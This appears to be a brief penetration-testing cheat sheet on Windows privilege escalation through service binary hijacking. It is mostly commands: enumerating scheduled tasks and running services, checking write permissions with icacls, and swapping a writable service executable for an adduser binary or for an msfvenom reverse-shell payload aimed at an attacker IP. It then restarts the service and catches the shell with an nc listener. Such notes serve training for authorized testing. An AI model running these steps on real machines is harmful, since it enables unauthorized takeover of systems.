Service Binary hijacking
Service Binary hijacking
check programs on scheduled tasks
schtasks /query /fo LIST /v
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
Check permission (full or writable) of programs found
icacls <full-path>
icacls C:\Users\steve\Pictures\BackendCacheCleanup.exe
transfer any adduser.exe executable and rename it with exploitable exe name
OR msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.119.126 LPORT=139 -f exe > httpd.exe
sc.exe stop <service-name>
sc.exe start <service-name>
nc -nvlp 139 if reverse shell exe is used
Last updated